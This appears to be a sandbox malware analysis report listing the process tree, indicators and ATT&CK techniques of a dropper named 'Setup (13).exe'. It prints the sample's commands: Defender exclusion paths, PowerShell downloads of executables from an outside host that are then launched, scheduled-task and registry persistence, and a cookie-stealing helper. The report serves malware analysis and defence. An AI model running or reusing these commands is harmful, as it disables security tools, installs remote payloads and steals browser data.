pid Process 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1768 1968 Setup (13).exe 31 PID 1968 wrote to memory of 1768 1968 Setup (13).exe 31 PID 1968 wrote to memory of 1768 1968 Setup (13).exe 31 PID 1968 wrote to memory of 1768 1968 Setup (13).exe 31 PID 1968 wrote to memory of 752 1968 Setup (13).exe 32 PID 1968 wrote to memory of 752 1968 Setup (13).exe 32 PID 1968 wrote to memory of 752 1968 Setup (13).exe 32 PID 1968 wrote to memory of 752 1968 Setup (13).exe 32 PID 1968 wrote to memory of 1940 1968 Setup (13).exe 35 PID 1968 wrote to memory of 1940 1968 Setup (13).exe 35 PID 1968 wrote to memory of 1940 1968 Setup (13).exe 35 PID 1968 wrote to memory of 1940 1968 Setup (13).exe 35 PID 1968 wrote to memory of 1072 1968 Setup (13).exe 34 PID 1968 wrote to memory of 1072 1968 Setup (13).exe 34 PID 1968 wrote to memory of 1072 1968 Setup (13).exe 34 PID 1968 wrote to memory of 1072 1968 Setup (13).exe 34 PID 1968 wrote to memory of 2040 1968 Setup (13).exe 39 PID 1968 wrote to memory of 2040 1968 Setup (13).exe 39 PID 1968 wrote to memory of 2040 1968 Setup (13).exe 39 PID 1968 wrote to memory of 2040 1968 Setup (13).exe 39 PID 1968 wrote to memory of 1980 1968 Setup (13).exe 38 PID 1968 wrote to memory of 1980 1968 Setup (13).exe 38 PID 1968 wrote to memory of 1980 1968 Setup (13).exe 38 PID 1968 wrote to memory of 1980 1968 Setup (13).exe 38 PID 1968 wrote to memory of 1608 1968 Setup (13).exe 37 PID 1968 wrote to memory of 1608 1968 Setup (13).exe 37 PID 1968 wrote to memory of 1608 1968 Setup (13).exe 37 PID 1968 wrote to memory of 1608 1968 Setup (13).exe 37 PID 1968 wrote to memory of 1612 1968 Setup (13).exe 36 PID 1968 wrote to memory of 1612 1968 Setup (13).exe 36 PID 1968 wrote to memory of 1612 1968 Setup (13).exe 36 PID 1968 wrote to memory of 1612 1968 Setup (13).exe 36 PID 1968 wrote to memory of 268 1968 Setup (13).exe 45 PID 1968 wrote to memory of 268 1968 Setup (13).exe 45 PID 1968 wrote to memory of 268 1968 Setup (13).exe 45 PID 1968 wrote to memory of 268 1968 Setup (13).exe 45 PID 1968 wrote to memory of 1856 1968 Setup (13).exe 44 PID 1968 wrote to memory of 1856 1968 Setup (13).exe 44 PID 1968 wrote to memory of 1856 1968 Setup (13).exe 44 PID 1968 wrote to memory of 1856 1968 Setup (13).exe 44 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1656 1968 Setup (13).exe 47 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 1156 1968 Setup (13).exe 50 PID 1968 wrote to memory of 796 1968 Setup (13).exe 53 PID 1968 wrote to memory of 796 1968 Setup (13).exe 53 PID 1968 wrote to memory of 796 1968 Setup (13).exe 53 PID 1968 wrote to memory of 796 1968 Setup (13).exe 53 PID 1968 wrote to memory of 1600 1968 Setup (13).exe 52 PID 1968 wrote to memory of 1600 1968 Setup (13).exe 52 PID 1968 wrote to memory of 1600 1968 Setup (13).exe 52 PID 1968 wrote to memory of 1600 1968 Setup (13).exe 52 PID 1968 wrote to memory of 1616 1968 Setup (13).exe 56 PID 1968 wrote to memory of 1616 1968 Setup (13).exe 56
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\Documents\hKLxWAmB6h_lA9ugEvBwxrPL.exe"C:\Users\Admin\Documents\hKLxWAmB6h_lA9ugEvBwxrPL.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe"C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:752 -
C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exeC:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe3⤵
- Executes dropped EXE
PID:2628
-
-
C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exeC:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
-
C:\Users\Admin\Documents\YZT8Iy2essV8eBCyCTScl2gF.exe"C:\Users\Admin\Documents\YZT8Iy2essV8eBCyCTScl2gF.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe"C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1940 -
C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exeC:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
-
C:\Users\Admin\Documents\jUZ6li9WSRNIcgHJz6js3sqb.exe"C:\Users\Admin\Documents\jUZ6li9WSRNIcgHJz6js3sqb.exe"2⤵
- Executes dropped EXE
PID:1612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit3⤵PID:2932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')4⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'4⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵PID:3460
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵PID:1532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵PID:3884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"7⤵PID:2740
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit8⤵PID:3076
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'9⤵
- Creates scheduled task(s)
PID:2984
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"8⤵PID:3140
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit9⤵PID:3992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'10⤵
- Blocklisted process makes network request
PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'10⤵PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'10⤵PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'10⤵PID:1000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"10⤵PID:3644
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit11⤵PID:3904
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'12⤵
- Creates scheduled task(s)
PID:3816
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"11⤵PID:3900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"11⤵PID:3652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵PID:864
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"8⤵PID:2532
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:3124
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'4⤵PID:2028
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"5⤵PID:1240
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'4⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"5⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"6⤵PID:3632
-
-
-
-
-
-
C:\Users\Admin\Documents\RyBE1qMZ9cWKbQn1GZuYEQjn.exe"C:\Users\Admin\Documents\RyBE1qMZ9cWKbQn1GZuYEQjn.exe"2⤵
- Executes dropped EXE
PID:1608 -
C:\Users\Admin\AppData\Roaming\4919889.exe"C:\Users\Admin\AppData\Roaming\4919889.exe"3⤵PID:3424
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3424 -s 17404⤵
- Program crash
PID:3788
-
-
-
C:\Users\Admin\AppData\Roaming\4029637.exe"C:\Users\Admin\AppData\Roaming\4029637.exe"3⤵PID:2220
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:1652
-
-
-
C:\Users\Admin\AppData\Roaming\8853850.exe"C:\Users\Admin\AppData\Roaming\8853850.exe"3⤵PID:2568
-
-
-
C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe"C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1980 -
C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exeC:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
-
C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe"C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2040 -
C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exeC:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
-
C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe"C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe"C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
C:\Users\Admin\Documents\XgAOyfoaY_gWudB0duDCIif0.exe"C:\Users\Admin\Documents\XgAOyfoaY_gWudB0duDCIif0.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:268
-
-
C:\Users\Admin\Documents\hT4cFg82frtRHsFZ3p8gcUUq.exe"C:\Users\Admin\Documents\hT4cFg82frtRHsFZ3p8gcUUq.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Users\Admin\Documents\nMuZyyhT5O_3WsNSlSv73SXg.exe"C:\Users\Admin\Documents\nMuZyyhT5O_3WsNSlSv73SXg.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe"C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe"2⤵
- Executes dropped EXE
PID:1600 -
C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe"C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe" -q3⤵
- Executes dropped EXE
PID:2168
-
-
-
C:\Users\Admin\Documents\ClWH5U_Ry5tTIMV2LDfMvK7_.exe"C:\Users\Admin\Documents\ClWH5U_Ry5tTIMV2LDfMvK7_.exe"2⤵
- Executes dropped EXE
PID:796
-
-
C:\Users\Admin\Documents\Yoo8p966jHdZsA9XlwCAc2n0.exe"C:\Users\Admin\Documents\Yoo8p966jHdZsA9XlwCAc2n0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Users\Admin\Documents\0lCH1Ut0rTj5YwZRc84Tmco6.exe"C:\Users\Admin\Documents\0lCH1Ut0rTj5YwZRc84Tmco6.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 8843⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
C:\Users\Admin\Documents\_gCsOx8e0Q1gmCuJDgeQu9c7.exe"C:\Users\Admin\Documents\_gCsOx8e0Q1gmCuJDgeQu9c7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Users\Admin\Documents\FnoYhdabwbrzrHiHCL15DRod.exe"C:\Users\Admin\Documents\FnoYhdabwbrzrHiHCL15DRod.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Users\Admin\Documents\10QMl_5nm37gIlOrnVRDddWt.exe"C:\Users\Admin\Documents\10QMl_5nm37gIlOrnVRDddWt.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:1724 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2552 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:2720
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3736
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2600
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵PID:2628
-
-
-
C:\Users\Admin\Documents\gHzyuVDqYz0a4TsmZpGoRkli.exe"C:\Users\Admin\Documents\gHzyuVDqYz0a4TsmZpGoRkli.exe"2⤵
- Executes dropped EXE
PID:1008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gHzyuVDqYz0a4TsmZpGoRkli.exe" /f & erase "C:\Users\Admin\Documents\gHzyuVDqYz0a4TsmZpGoRkli.exe" & exit3⤵PID:2400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gHzyuVDqYz0a4TsmZpGoRkli.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BDB4063D-C763-4DDE-84A4-9CA5916DB046} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:2940
-
C:\Users\Admin\AppData\Roaming\grwbiruC:\Users\Admin\AppData\Roaming\grwbiru2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵
- Executes dropped EXE
PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵PID:1956
-
-
C:\Users\Admin\AppData\Roaming\grwbiruC:\Users\Admin\AppData\Roaming\grwbiru2⤵PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵PID:3500
-
-
C:\Users\Admin\AppData\Roaming\grwbiruC:\Users\Admin\AppData\Roaming\grwbiru2⤵PID:3700
-
-
C:\Users\Admin\AppData\Local\Temp\6BDD.exeC:\Users\Admin\AppData\Local\Temp\6BDD.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
C:\Users\Admin\AppData\Local\Temp\B7CC.exeC:\Users\Admin\AppData\Local\Temp\B7CC.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
C:\Users\Admin\AppData\Local\Temp\3BA.exeC:\Users\Admin\AppData\Local\Temp\3BA.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"2⤵
- Executes dropped EXE
PID:1068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\3⤵PID:1664
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\4⤵PID:2436
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F3⤵
- Creates scheduled task(s)
PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\9FCC.exeC:\Users\Admin\AppData\Local\Temp\9FCC.exe1⤵PID:3524
-
C:\Users\Admin\AppData\Local\Temp\is-VARPQ.tmp\9FCC.tmp"C:\Users\Admin\AppData\Local\Temp\is-VARPQ.tmp\9FCC.tmp" /SL5="$A017C,6477783,831488,C:\Users\Admin\AppData\Local\Temp\9FCC.exe"2⤵PID:3612
-
C:\Users\Admin\AppData\Local\Temp\9FCC.exe"C:\Users\Admin\AppData\Local\Temp\9FCC.exe" /VERYSILENT3⤵PID:2644
-
C:\Users\Admin\AppData\Local\Temp\is-4HMC7.tmp\9FCC.tmp"C:\Users\Admin\AppData\Local\Temp\is-4HMC7.tmp\9FCC.tmp" /SL5="$B017C,6477783,831488,C:\Users\Admin\AppData\Local\Temp\9FCC.exe" /VERYSILENT4⤵PID:1344
-
C:\Users\Admin\AppData\Roaming\TurboCollage Service\smartplug.exe"C:\Users\Admin\AppData\Roaming\TurboCollage Service\smartplug.exe"5⤵PID:2516
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1